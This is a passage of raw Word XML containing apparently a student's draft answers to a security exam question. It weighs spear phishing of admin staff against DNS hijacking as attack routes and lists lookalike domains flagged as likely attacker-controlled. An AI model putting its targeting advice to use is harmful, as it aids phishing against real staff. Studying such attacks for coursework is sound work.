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133CAF8" w:rsidP="01D0C2D5" w:rsidRDefault="199E8489" w14:paraId="63142A9A" w14:textId="123705B5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5FC95357">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Question 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1133CAF8" w:rsidP="499DF1D5" w:rsidRDefault="1133CAF8" w14:paraId="267F3EBC" w14:textId="37D4B4F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ai)</w:t>
      </w:r>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="0147D1E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0147D1E2" w:rsidP="06C6DA00" w:rsidRDefault="03F07FB8" w14:paraId="74C323BF" w14:textId="6D9CCA07">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="06C6DA00">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Is this assessed?</w:t>
      </w:r>
      <w:r w:rsidR="0147D1E2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="06C6DA00" w:rsidR="48356402">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="06C6DA00" w:rsidR="48356402">
        <w:t>why not?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidRDefault="48356402" w14:paraId="46B3656D" w14:textId="18B22E31">
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Spear (targeted) Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="251337FD" w14:textId="672F5637">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Phishing against specific people/sub-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>organisations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/teams</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="3922E04D" w14:textId="56C5BAA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>E.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> directed phishing emails to security/admin staff with control over access rights</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="0BE6BE6C" w14:textId="2E468936">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Combines social engineering with phishing (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> use knowledge about personalities/jobs to tune phishing emails)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidRDefault="48356402" w14:paraId="09C8B945" w14:textId="7C485DEC">
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Adv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="4CBA0CAF" w14:textId="756DF890">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Discrete: Could only affect one single person, so nobody else knows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="0008D986" w14:textId="03025E90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Powerful: Some staff will have a lot of control over infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="4A6236C4" w14:textId="24E1EC88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Easy: Sending (convincing) phishing emails is very simple</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="6B1C2CED" w14:textId="7920A66B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Effective for APT; if only interested in one target, only requires one targeted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="55A7537B" w14:textId="7A518322">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>One shot: if discovered, very unlikely to fall for it again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="6512373B" w14:textId="063EA5DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Risky: acquired knowledge may have clear origin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidRDefault="48356402" w14:paraId="4DBB7518" w14:textId="4DD68182">
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DNS Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="7BACEC74" w14:textId="356D1AE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromise DNS resolver, to control DNS resolutions of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="535DE668" w14:textId="0DC7EEC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromise registrar/TLD to hijack DNS resolver’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>power</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidRDefault="48356402" w14:paraId="15C9DF1A" w14:textId="4B8AC45D">
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Adv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="00413DE9" w14:textId="5132594D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Can affect all members of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>organisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>; steal anybody's information/accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="04F32DD5" w14:textId="3E0EF7E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Powerful: at most can effectively shut down a business</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="1726CED4" w14:textId="23CEFD12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Difficult: DNS resolvers likely have good security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="5771860B" w14:textId="7FAB387D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>MITM a website can be obvious (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> bad certificate/badly copied UI)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="2C14B964" w14:textId="692941A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">More likely to be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>detected;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> as now two </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>organisations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> are involved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48356402" w:rsidP="133B6B4D" w:rsidRDefault="48356402" w14:paraId="3F59850E" w14:textId="786C0375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">APT usually require long term; DNS hijacking may get stopped in a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>day</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="06C6DA00" w:rsidP="06C6DA00" w:rsidRDefault="06C6DA00" w14:paraId="15FA22E1" w14:textId="0174C094">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1133CAF8" w:rsidP="61D57FC2" w:rsidRDefault="30E8CEEE" w14:paraId="10258547" w14:textId="7BE2E2F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bi) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Use online tools such as </w:t>
      </w:r>
      <w:r w:rsidR="07F1EB33">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, you can discover domains that are currently </w:t>
      </w:r>
      <w:r w:rsidR="09FE8232">
        <w:t>unregistered, which means that they are very likely to be controlled by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6799B142" w:rsidP="499DF1D5" w:rsidRDefault="6799B142" w14:paraId="6B1A6F70" w14:textId="64DA6FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>a.doulbeclick.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6799B142" w:rsidP="499DF1D5" w:rsidRDefault="6799B142" w14:paraId="190D744D" w14:textId="3D27CBE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>apple-iclouds.net</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6799B142" w:rsidP="499DF1D5" w:rsidRDefault="00B13CFE" w14:paraId="650ACDCB" w14:textId="679D4850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5">
        <w:r w:rsidRPr="499DF1D5" w:rsidR="6799B142">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://google-ana1ytics.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6799B142" w:rsidP="499DF1D5" w:rsidRDefault="6799B142" w14:paraId="1F6BFD0A" w14:textId="6A388257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>micr0soft.org</w:t>
      </w:r>
    </w:p>
    <w:commentRangeStart w:id="0"/>
    <w:commentRangeStart w:id="1"/>
    <w:p w:rsidR="6799B142" w:rsidP="1799B02E" w:rsidRDefault="00B13CFE" w14:paraId="23E54E53" w14:textId="0465A092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "http://microsoftazuread-sso.com/" \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="1799B02E" w:rsidR="6799B142">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>http://microsoftazuread-sso.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:r w:rsidR="001115FD">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="6799B142" w:rsidP="75FE2C14" w:rsidRDefault="6799B142" w14:paraId="08AA9F47" w14:textId="122E54EC">
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bii) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6799B142" w:rsidP="75FE2C14" w:rsidRDefault="4BAAC26D" w14:paraId="3F377031" w14:textId="07FB92D7">
      <w:r>
        <w:t>The examiner feedback suggests looking for port knocking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6799B142" w:rsidP="75FE2C14" w:rsidRDefault="1C377E27" w14:paraId="5EB8934C" w14:textId="626D27C5">
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Idea 1/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6799B142">
        <w:t>10.39.26.150:1352, since 1352 is not a common port. (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="6799B142">
        <w:t>might</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="6799B142">
        <w:t xml:space="preserve"> not be correct)</w:t>
      </w:r>
      <w:r w:rsidR="5B42A9F3">
        <w:t xml:space="preserve"> --There are other high numbered ports wow-- ;(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="08972E0E" w:rsidP="75FE2C14" w:rsidRDefault="08972E0E" w14:paraId="43BBE30E" w14:textId="36FF12F9">
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Idea2/</w:t>
      </w:r>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="00795A36">
        <w:rPr>
